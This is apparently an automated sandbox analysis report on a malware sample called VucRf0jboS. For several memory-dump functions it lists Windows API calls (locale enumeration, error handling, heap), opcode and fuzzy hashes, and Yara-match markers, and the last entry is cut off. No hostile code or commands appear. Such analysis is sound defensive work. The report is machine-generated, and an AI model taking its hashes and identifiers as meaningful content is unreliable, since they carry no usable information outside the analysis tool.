Instruction ID: 3f899f575283045598b9822b51e4c7cfb780d425c540320f6dbc7b00f372bd6e
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 3A21B6729502069BEB28EE28DC81BBA77ACEB48314F1001BAED1AD6150E775F954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0416045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 041604CF

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 542828be4532425bd687f4cd7750d37fc26aa71d22fe881155db60feda36a759
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 021129366003019FDB28DF39D8E46BABB91FF84318B54442DE98787A40D371B552C740

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 04160A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,041607A3,00000000,00000000,?), ref: 04160A31

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: a1726656d864b7605c994003f84a7a9b38ae647571e9a9544c8c9f1b3d70537f
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: D7F0FE326101256FDB28DA148C457BA7FA8DB44754F050469ED0FA3140EB75FE51C5D0

Uniqueness

Uniqueness Score: -1.00%

Function 041607D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04160829

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: fd364cc7628cb7cc9bac6280e9e63dd92415cef2e7830e1b499222cb9052e2d2
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 7BF0D132A51209ABEB18EF64DC91ABA33ACDB88314F0001BAE90AD7240DB74BD0587D4

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 041604F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 04160544

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 6c25101d50895f277c7a8b25db726fdd47db59e4e5c7ef6163239646b3f1794d
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 39F022323003045FEB289F399CC0A7A7B92EF8636CF0480ADF9068B640D7B1E852CA40

Uniqueness

Uniqueness Score: -1.00%

Function 0415774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04154002,?,00000004), ref: 0415779E

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: 72a19c47952256559b5b50ff8eedc051c9334b05ff0f56c4783d0386110c4e9a
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: A3F0F631741218FBDB11AF60EC46FBE3B62DF04B10F900075FC19261A0CB715E209699

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 04157358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04151C62: RtlEnterCriticalSection.NTDLL(?), ref: 04151C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 04157390

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 56e507bd8a41f9797277821c774cd75c4808cc0f6b7c16ee792f8d17d6d1bf66
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: 0DF03C72A60304EFEB15EF78D885B9D7BB0EB04728F10516AE914DB2A0CB7569448B89

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 04160412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 04160449

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1709fb9d6a7fb0744777f48ccfd2b3c0804d014735ccbc4db163184052843ac5
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: E8F0553630021597CB18AF3ADC8577ABF90EFC1714F46409AEE0A8B251C772E842C790

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04149E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,041495DF), ref: 04149E72

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 0414F6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0414F818

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: e0c4c3bdca67f8e4236c50a20bd59e8eb7d66bff12a8ae6cd6b30c39b577b7f1
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F451AA6170074A57EF384E7885E87BF23DA9FC6318F58098AD842CB392D709F9478366

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 0414C3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 140a32de91a9e451739a71e124e966e91b7ebe90bc6f9b7de3b285354612174a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: F491417220A0A34ADB6D463E95B807EFEE15BC22A170B17DED4F2CA1C5FF14E154D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 0414C6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 47941ac79bee044505aa1ef84e6b60ccf4ed690bbad32deb12cae9a728f66aae
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 8891427620A0A34AEB69467E85B403DFFE15BC26B270B07DED4F2CA1C5FF14A154E660

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 0414C131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 98e21fc1874434f26d13b81f10f9c032423ae5d73185bb1b21a28c0b6361eefd
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: C391737220A0A34ADB2D467E95B443EFFE15BC26A130B07EED4F2CA5C5FF14E1649660

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 0414BE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 76e4f348d0083da15ba83460519564423aa939c8edffc28171be5a6ce0fe3c43
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 67813D7620D0A249DB2D467A95B403EFFE15BC26A170B07DEE4F6CB1C1FF24E1549A60

Uniqueness

Uniqueness Score: -1.00%

Function 041E54B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: fad8b94e79f32ba2623cc75c8f41d3463bc78ccdf36d5c1880f1924c69b86a85
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 26113076340500AFD754DE96DCC5EB673EBEB89324B198095ED08CB316E775E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 04140D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 44157d52b0374e4f13780089e5c5ae27608567c4c3222d9340df5fb56acb8ace
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: D801D472A006008FDB21CF21C854BAA37B5EBC9205F0544E4EA0697241E370B9458B80

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

